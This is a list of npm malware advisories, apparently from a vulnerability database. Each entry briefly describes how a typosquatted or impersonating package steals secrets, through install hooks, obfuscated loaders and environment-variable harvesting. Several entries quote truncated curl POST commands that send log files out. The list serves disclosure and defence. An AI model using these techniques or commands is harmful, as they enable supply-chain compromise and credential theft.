226511 matches found
Malicious code in ref-slot (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1e1ef3e785cf6cb007c0b33be2ed43ebe49d64f476bb4fb3a66b914b06def5e1 On npm install, the package's postinstall hook runs node test.js which invokes index.js to perform multi-stage installer compromise. 1 Credential...
Malicious code in typedecode (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 593662d3b4cda901642b713f419417807a33f3dca74e818f66e8d0cf9ebcf6e3 On require'typedecode' / import 'typedecode', the bundled dist/index.cjs and dist/index.js execute an obfuscated import-time payload. A bootstrap.js...
Malicious code in textshape-css (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4e596e1ea1365aadfa6c75047b664bb41b29b60828595b9271d4c2c217476b60 The package presents itself as a Tailwind CSS typography plugin its name, description, and source tree clone @tailwindcss/typography, but src/index.j...
Malicious code in colorpicker-ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 226e4e81049c5688a16a198fb9a90ab3d11d371b621e367da4590632f4e5e140 Package presents itself as a minimal React color-picker but ships a postinstall hook "postinstall": "node setup.js" that performs targeted credential...
Malicious code in tailwind-color-shades (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfd681005962f5628f4394450bae9430992e58159e3256bb4af2bc156c5c1fc5 The package's documented entry point index.ts begins with import './src/bootstrap';, which causes src/bootstrap.js to run whenever the module is...
Malicious code in tailwindcss-effector (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4780f88b1924c1d5104a4ea18803a0180e9339e5c9a9bf787f9ed4901e1729e3 src/index.js appends a heavily obfuscated async IIFE after a legitimate-looking TailwindCSS plugin. On import, the IIFE issues HTTPS requests to remo...
Malicious code in chlklib (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b08a933891c92fdec26fbadf4921d2e08ff101126fb656a2b57d747fefa9d0d4 Package name chlklib is a one-character deletion of the popular chalk package and replicates chalk's public API surface Chalk, chalkStderr,...
Malicious code in ts-precision (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c Package ships a verbatim copy of big.js v7.0.1 including the original author metadata 'Michael Mclaughlin ' and repo reference MikeMcl/big.js under a...
Malicious code in ts-opus (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 73b0105b34723dd6e1449c3353d1d4df0dcf94ae460a4dfd156566bb4ba372c7 ts-opus 0.0.8 ships an unmodified copy of MikeMcl/big.js README, copyright, and repository URL all reference big.js but injects an additional top-lev...
Malicious code in @vpms/design-system (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 43ce5813fba2660b094a3e8a5c5a0bf2f1972530c294830c0a2e3d15dcd1b096 package.json declares preinstall="node index.js". On every npm install, index.js iterates process.env and harvests any variable whose name contains...
Malicious code in chai-as-built (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 469c5ebe97d1e69d080295000d723febbb06050f65aed9a0f44a76fd707c0b1e chai-as-built masquerades as the pino logger package.json keywords 'fast','logger','stream','json'; file layout lib/proto.js, lib/redaction.js,...
Malicious code in gx-npm-feature-flags (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...
Malicious code in @colibri-event-types/megamarket-ru-web (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c4780aaf3b99e11830e6a5eda56c287f9f8e93d375f1f59320ecc9849ebdf4fe scripts/postinstall.js is registered as the npm postinstall lifecycle script and is heavily packed with obfuscator.io string-array rotation plus a...
Malicious code in abu-common-components (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 17e7b4ac8a492915d8475c73488b64236250746de410c705b7cc43c0656589be package.json declares preinstall and postinstall hooks that invoke curl against a hardcoded bare-IP HTTP endpoint...
Malicious code in dttsdee (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...
Malicious code in easy-string-kit232 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9c3f74b6873c47dc8f3a6d6922e9d66d17cafe47b7a80447f45bfe0d1535a6b5 package.json declares a postinstall lifecycle script that auto-executes on npm install and runs curl -X POST -d "$ls -la /data/logs/"...
Malicious code in dddooo (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...
Malicious code in easy-string-kit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...
Malicious code in wp-codebox-workspace (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a44aa2030ed09d6ec3998c59953a44e013c1993d93a90ee031b0999480afb03c Package is published at version 9999.99.99 with a description referencing an 'npm 404 error referenced in Extra-Chill/homeboy-extensions' — the...
Malicious code in simple-node-calc-c (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 289de4cd84a2ac40ef42f8b449ba58e9d8900d766a0638061ef2e75092b1f1a4 Package advertises itself as a 7-function calculator but ships an undeclared 87KB heavily obfuscated file lodash-compiler.js obfuscator.io string-arr...
Malicious code in simple-node-calc-a (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f9a86d4aeac1d4f5fc458b3058f4b13229cd2097c9d8e5cf3e4d45aa24980ad8 [email protected] advertises itself as a pure-JS calculator but ships a binding.gyp that triggers node-gyp automatically during npm install...
Malicious code in simple-node-calc-b (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78b115418f82ef73f995f3bf6b0cb8bf50da516b56c691b76ccb939491d2b046 [email protected] ships a binding.gyp that includes a modules file declaring "lodash": "!node lodash-compiler.js". The gyp !... syntax execute...
Malicious code in simple-node-calc-aa (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7274769c1f72a3c00ec34290bd2e0dff85b9c41d6a85cfffc1b164b46280de72 Package advertises itself as a trivial arithmetic helper but ships a binding.gyp whose sources list uses gyp's !... shell expansion: "!node...
Malicious code in simple-node-calc-ccc (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f9bfe35484999f40374a6dcfea11247cf3407a3177e27506c714407b9384036a Package name 'simple-node-calc-ccc' presents as a trivial calculator but ships lodash-compiler.js, an 87KB obfuscator.io-packed file using rotating...
Malicious code in subsearch (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04245cd013e6aa9edb766cf14249c9dd6abd19d6beb9671c22a1a8bbbff3d511 The package's main entry index.js is the only file of substance and is wrapped in obfuscator.io string-array + RC4 obfuscation that hides every liter...
Malicious code in stitch-design (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 81a0c5de3abe7924f58304e27e1537821c217c9348c060b31c5424407f9f10cc The npm package ships a preinstall lifecycle hook scripts/preinstall.js that, on npm install, reads classic installer-secret paths — /.gitconfig,...
Malicious code in based-32 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 52ca241d887ed83628c8c4a4432ca0f832d092e6058c7ab4250cc5b169ba7fb9 based-32 advertises itself as a zero-dependency RFC4648 Base32 encoding library, but dist/index.js ships a hidden trigger inside the exported...
Malicious code in howdybase32 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c0eab759e668db62de0eaa10d1f5d32c689b00c7c3d6d2b1517439cc5df3e956 The package advertises itself as a fast, zero-dependency base32 encoder/decoder, but its only bin entry bin/hibase32.js silently invokes...
Malicious code in nizzybase32 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cd8ad52e73a1c796a1dbe22501f4ef2d42f3ceea98cc259e1ceefb1a214cfa56 The CLI in bin/hibase32.js computes SHA256 of user input and, on one hardcoded magic digest...
Malicious code in base58-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 048a186e2e59bb0b7d9986c7099e527390e38690292bc49e237578a471c56680 The package advertises itself as a Base58 encoder/decoder but on require schedules a delayed payload that performs multiple installer-side attacks...
Malicious code in bs58-86 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 057e2e470e0bc9dbfd2ff37955c0c7d051cca944025b9d62c882ffc98c4434e5 Package [email protected] reproduces the name, README, repository URL cryptocoinjs/bs58, and exported API of the widely-used bs58 base58 encoding library...
Malicious code in base62-86x (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 811002816e7f72588c7c6540b088af5c44b8280574e43dbaeef4701fe377fe9f Package impersonates the legitimate base-x/base62 library by Daniel Cousens name base62-86x, homepage pointing at cryptocoinjs/base-x, identical sour...
Malicious code in agentsync-tool (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 430fd9891020d33aa720cede12887f97615ac764bd8af19dc27f18bba4729c38 The package advertises itself as a zero-dependency pure-JS markdown sync tool 150 lines but ships an undocumented 2.9MB Windows PE binary at...
Malicious code in agentsync-pkg (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b383c760dffae4a26d7f94b433bbe00dedb2426b23f4713610d6f5f36c594cf1 On every import / require'agentsync-pkg', src/index.js line 152 resolves bin/native/parser.node and calls require on it: const p =...
Malicious code in logfmt-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bb22b2557674e7d616805d8a4086d69e02896be169b9e5d4d053eb3628ebe038 On npm install, scripts/install-check.cjs registered as a postinstall lifecycle script fetches a JSON config from a hardcoded anonymous Vercel app UR...
Malicious code in polymarket-stake-math (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a8a5200cef3811ce98e489080709917dfafc2216a17f90329b9930e0f5f630a1 The package ships a postinstall hook scripts/sync-peer.cjs that runs on every default npm install. The script compares the installed version against ...
Malicious code in polymarket-stake-maths (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 657363aaa0b94385d30a26c1f4ee67923b0d877975850ad08f8364c2a901d8e7 On npm install, the package's postinstall script scripts/install-check.cjs fetches a JSON config from...
Malicious code in easy-time-format (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 68e3ed59cdf42b986633df92080189576ccb0c6482e9418dab47b72ac45cf97b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in tokenization-util (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 81f8a194aa79844110dede95f5f8c798d05c04c08f1a4f5d8822124b17c65fa6 The package advertises plain math/formatter helpers but index.js contains a heavily obfuscated payload concealed inside the calculateTokenPrice...
Malicious code in unifydata (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0c62d93328810f03f3aac73777f406eee1b3413e1c3320eb87f3445754dba9d3 On require'unifydata', index.js calls initPlugin at module top level, performs an HTTPS GET to https://jsonkeeper.com/b/B40HL, JSON-parses the...
Malicious code in anthropic-claude-latest (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 39eab369e2498da827d3bbd331effdf24b99ab28961e62da7328e4476e328876 Package anthropic-claude-latest claims to be an 'Official Anthropic Claude SDK wrapper' but ships no Anthropic SDK code; the README is for an unrelat...
Malicious code in block-slot (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 45d25c6b3ae56eaaf7f76995fc0b6f93a8499b9cbe2315446a63cb5601d841d4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in poc-publish-test-su-doughnym (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 54e0dbb8f5ce514035d0c4596f5b78b47f14ab145f2d43172bf13b595df78661 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @su-doughnym/react-dlb (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 3c4b5ea9035f910a7193b9da02623e92d8364869382bf683b3469ea3a2b46fdc Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @su-doughnym/loginui (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 97528ba896a094d6b1ed4306c1553ae6f3887d808d4e4bcb6d03d9ee29e1a8b6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in nabisco (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 4c6b974c237c0a7f1806c58521bb7f5353e013785144f2124b21d0fe676c2b7c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @su-doughnym/metrics-js (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c1b02acc9d8d069bfdf5db415cb18c33e05ffdcd577532cfc3dbd112e4d9a6f6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in two-factor-prompt-lib (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d7f55251c2837eacfe7f8b0c2ab44077608dc2562f3c167dc1d2927b9f730fad Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @su-doughnym/hubspot-loginui-poc (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e22fa4def0472cf65c32dfc2476ccebd428bc92163cb0095bea52240b1c1c914 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in data-fetching-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7e3b28cd7d92e52caebbbc24439e3075e592ca43dbeb5cd711d4ccb3df74c1ec Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...